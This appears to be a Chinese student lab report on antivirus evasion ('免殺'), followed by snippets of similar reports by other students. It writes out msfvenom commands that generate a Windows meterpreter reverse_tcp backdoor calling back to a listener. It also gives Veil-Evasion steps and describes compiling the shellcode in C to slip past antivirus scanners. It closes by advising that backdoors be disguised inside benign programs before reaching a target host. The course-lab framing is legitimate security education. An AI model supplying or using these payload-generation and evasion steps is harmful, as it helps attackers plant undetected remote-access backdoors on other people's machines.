20145228《網路對抗技術》免殺原理與實踐

2022-07-17 17:24:12 字數 1806 閱讀 9239

•理解免殺技術原理

•正確使用msf編碼器,veil-evasion,自己利用shellcode程式設計等免殺工具或技巧

(1)殺軟是如何檢測出惡意**的?

1*惡意**一般具有明顯的特徵碼,依據特徵碼來判斷是否是惡意**

2*如果乙個程式的行為是帶有惡意的行為,也會被檢測為惡意**

(2)免殺是做什麼?

免殺就是避免殺軟的查殺與檢測

(3)免殺的基本方法有哪些?

•改變特徵碼

•盡量避免殺軟檢測到帶有惡意的行為,如使用**式連線

·按照前一次實驗的操作,用msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.128 lport=5228 -f exe > 20145228.exe來生成乙個後門程式

·然後利用ncat指令傳送到主機

·最後檢測結果:

基本都可以發現這是個惡意**

·直接輸入veil-evasion開啟

·然後依次鍵入以下指令:

use python/meterpreter/rev_tcp//設定payload

set lhost 192.168.88.144//設定**連線ip

set lport 5228//設定**埠5228,預設為4444

generate//生成

145213//程式名

以結果圖可知,該可執行檔案存在kali計算機的/var/lib/veil-evasion/output/compiled/資料夾裡。

檢測結果:

這次基本沒幾個能檢測出來了

•使用msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.3 lport=5228 -f c命令生成乙個c語言shellcode陣列

•然後將這段陣列在vc上進行編寫shellcode

•在kali下使用msf監聽,執行剛剛編譯生成的可執行檔案,成功獲取許可權。

最後再去檢測

附上我的殺軟版本:

清楚地了解了防毒軟體查殺的原理,如何使得自己的惡意**免殺、惡意**的偽裝。一款殺軟的檢測並不能代表最後的結果

最重要的是後門的偽裝,較好的方法是隱藏到一些非惡意程式裡再進入目標主機

20145309《網路對抗技術》免殺原理與實踐

20145309 網路對抗技術 免殺原理與實踐 1.基礎問題回答 1 殺軟是如何檢測出惡意 的?根據特徵來檢測 對已存在的流行 特徵的提取與比對 根據行為來檢測 是否有更改登錄檔行為 是否有設定自啟動 是否有修改許可權等等 2 免殺是做什麼?使用一些方法使得惡意程式不被殺軟和防火牆發現,避免被查殺。...

20145322《網路對抗技術》免殺原理與實踐

基於特徵碼的檢測 再就是根據該 是否有惡意行為來判別,若有惡意的行為,我們就認為該 是惡意 2 免殺是做什麼?通過改變惡意程式的明顯特徵等資訊已達到避免被防毒軟體查殺的技術。3 免殺的基本方法有哪些?改變特徵碼 對惡意 進行加殼,或用其他語言 如veil evasion 或編譯器進行再編譯,利用sh...

2015511《網路對抗》網路欺詐技術防範

ping通kali和靶機 因為之後用apache會用到80埠,所以先檢視80埠是否被占用,netstat tupln grep 80,如果有可以用kill 程序號殺死這兩個程序,再次檢視80埠占用情況,沒有被占用的程序 用vi開啟 etc apache2 ports.conf,檢視配置檔案中的監聽埠...